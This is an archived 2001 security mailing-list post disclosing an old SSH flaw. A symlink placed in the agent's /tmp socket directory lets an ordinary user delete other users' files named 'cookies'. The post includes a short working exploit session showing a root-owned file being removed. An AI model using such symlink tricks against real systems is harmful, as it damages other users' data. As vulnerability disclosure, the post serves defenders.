OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: zen-parsegmx.net
Date: Mon Jun 04 2001 - 05:14:29 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    SSH allows deletion of other users files.
    =========================================

    You can delete any file on the filesystem you want...

    as long as its called cookies.

    Not really a very useful bug, but could cause annoyances to
    people who actually like their cookies.

     /home/zen/.netscape/cookies

    sample exploit:-

     [rootclarity /root]# touch /cookies;ls /cookies
     /cookies
     [rootclarity /root]# ssh zenlocalhost
     zenlocalhost's password:
     Last login: Mon Jun 4 20:22:39 2001 from localhost.local
     Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
     [zenclarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
     [zenclarity zen]$ logout
     Connection to localhost closed.
     [rootclarity /root]# ls /cookies
     /bin/ls: /cookies: No such file or directory

    --zen-parse